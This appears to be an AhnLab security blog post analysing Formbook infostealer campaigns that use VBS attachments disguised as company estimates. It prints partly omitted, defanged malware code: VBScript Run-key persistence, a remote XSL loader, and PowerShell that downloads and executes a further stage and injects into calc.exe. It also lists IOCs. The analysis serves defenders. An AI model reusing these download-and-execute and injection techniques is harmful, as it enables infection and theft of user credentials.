# Change in Distribution Method of Malware Disguised as Estimate (VBS Script)

**asec.ahnlab.com/en/32149/**

February 28, 2022

Last year, the ASEC analysis team has discovered the distribution of Formbook that used a
certain company’s name in its filename. Recently, the team has discovered that it is being
distributed via VBS file. The email used for distribution still contains details about a request
for an estimate, and by using a certain company’s name in the attachment, it prompts the
user to execute it.


-----

Figure 1. Email 1


-----

Figure 2. Email 2
The compressed file attached to the email does not contain an executable but a VBS file.

Figure 3. Inside the attached compressed file


-----

All the malicious files that are being distributed are using the same company s name with
different dates, and dates differ by the distribution date. The names of the files that have
been discovered so far are as follows;

Kor***IndustryDevelopment(2022.02.03).pdf.vbs
Kor***IndustryDevelopment(2022.02.04).pdf.vbs
Kor***IndustryDevelopment(2022.02.07).pdf.vbs
Kor***IndustryDevelopment(2022-02-10).pdf.vbs
Kor***IndustryDevelopment(2022.02.16).pdf.vbs
Kor***IndustryDevelopment(2022.02.17).pdf.vbs
Kor***IndustryDevelopment(2022.02.21).pdf.vbs

Certain values are obfuscated in Kor***IndustryDevelopment(2022.02.21).pdf.vbs. When
unobfuscated, it shows the code that performs the feature of registering to Run Key and
accessing a certain URL.
```
Sub eQACeDnGd()
Const zTZPNQXZ = &H80000001
Set izXSnKvcF=Eval("GetObject(WSBI() + ""default:StdRegProv"")")
Cso = "Software\Microsoft\Windows\CurrentVersion\Run"
Fklft = "jtZsps"
XqTs = "C:\Users\[UserName]\Music\" + [Script filename]
izXSnKvcF.SetStringValue zTZPNQXZ,Cso,Fklft,XqTs
End Sub
Sub FRgMMrSnNR()
On Error Resume Next
 Set uVzfiIPoT = Eval("GetObject(new:F5078F32-C551-11D3-89B9-0000F81FE221)")
'MSXML2.DOMDocument.3.0의 CLASSID
 uVzfiIPoT.async = False
 Execute("uVzfiIPoT.Load hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg")
 Execute("uVzfiIPoT.transformNode (uVzfiIPoT)")
End Sub

```
Upon executing the VBS file, it accesses hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg,
and executes the additional script that exists in this URL. It then adds C:\Users\

[UserName]\Music\Kor***IndustryDevelopment(2022.02.21).pdf.vbs to
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jtZsps registry to enable the
malicious script for it execute consistently.

It also performs the command below to self-copy under the same filename into the C:\Users\

[UserName]\Music\ folder that is added to the registry.

cmd /c copy “Kor***IndustryDevelopment(2022.02.21).pdf.vbs” “C:\Users\

[UserName]\Music” /Y

The script code below exists in hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg, and
when accessing this URL, powershell is executed.


-----

```
<xsl:stylesheet version 1.0 
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:msxsl="urn:schemas-microsoft-com:xslt"
   xmlns:user="http://mycompany.com/mynamespace">
 <msxsl:script language="JScript" implements-prefix="user">
<![CDATA[
-omittedvar
yy=r.ShellExecute("powershell.exe",eioerhidfsg44g00ggg("2474303D27444535272E7265706C61
-omitted<em>function</em> eioerhidfsg44g00ggg(hex) {
  var str = '';
  for (var i = 0; i < hex.length; i += 2) {
    var v = parseInt(hex.substr(i, 2), 16);
    if (v) str += String.fromCharCode(v);
  }
  return str;
}

```
The obfuscated powershell command ultimately performs the command below and
downloads additional scripts from hxxp://wisewomanwarrior[.]com/wp-admin/self1.jpg.
```
$t0='IEX';
sal g $t0;
$gf="$ErrorActionPreference = 'SilentlyContinue';
$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;
Add-Type -AssemblyName Microsoft.VisualBasic;do {$ping = test-connection -comp
google.com -count 1 -Quiet} until ($ping);
$tty=g('(New-Object Net.WebClient)');
$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',
[Microsoft.VisualBasic.CallType]::Method,'hxxp://wisewomanwarrior[.]com/wpadmin/self1.jpg')|g" | %{
[System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };
g([system.String]::Join('', $gf))

```
Hxxp://wisewomanwarrior[.]com/wp-admin/self1.jpg contains obfuscated powershell
command and compressed file data. This script decompresses the data and injects it into a
certain process.
```
$eqCH=(01100110,01110101,01101110,01100011,<omitted>,01111101) | %{
[System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2))
};I`E`X([system.String]::Join('', $eqCH)) ‘Decompressing-related powershell script
[Byte[]]$MNB=('_<1F,_<8B,_<08, <omitted>,_<00'.replace('_<','0x'))|g;
[byte[]]$FFCgPVE = tMCfkSD $MNB
[Byte[]]$uiMz=('_<1F,_<8B,_<08, <omitted>,_<02,_<00'.replace('_<','0x'))|g
$ayy =
[Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,"Load",
[Microsoft.VisualBasic.CallType]::Method,$FFCgPVE)
[toooyou]::Black('calc.exe',$uiMz)

```

-----

Upon executing the script above, it uses the function inside the .Net executable that is saved
to the $MNB variable to inject the data inside $uiMz to calc.exe.

Figure 4. Process tree shown via AhnLab’s RAPIT system
The injected data is the Formbook infostealer. It operates by injecting into the normal
process explorer.exe and another normal process in system32 path and steals user
credentials via C&C connection.

C&C : hxxp://www.bumabagi[.]com/p7n9/

Malware disguised as an estimate has been consistently distributed from the past, so user
caution is necessary. As the malicious files are disguised under the name of actual
companies as shown above, users must check the sender and refrain from executing links or
attachments in emails from unknown senders.

AhnLab’s anti-malware software detects and blocks the malware using the aliases below.

**[Behavior and Memory Detection]**


-----

Malware/MDP.Inject.M3044
Malware/MDP.Inject.M3509
Ransom/MDP.BlueCrab.M3544
Trojan/Win.Formbook.XM89

**[File Detection]**

Downloader/VBS.Generic

**[IOC Info]**

f7918d4a953248d4878f0332bd235a53 (VBS)
23c238466940b27bf287dccaf3407923 (VBS)
cdfbfe783f4b40bdb86c1ac3bc126596 (VBS)
hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg
hxxp://wisewomanwarrior[.]com/wp-admin/self2.jpg
hxxp://www.bumabagi[.]com/p7n9/

**Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to**
**check related IOC and detailed analysis information.**

[Categories:Malware Information](https://asec.ahnlab.com/en/category/malware-information/)

[Tagged as:Estimate,](https://asec.ahnlab.com/tag/estimate/) [Formbook,](https://asec.ahnlab.com/en/tag/formbook-en/) [VBScript](https://asec.ahnlab.com/en/tag/vbscript-en/)


-----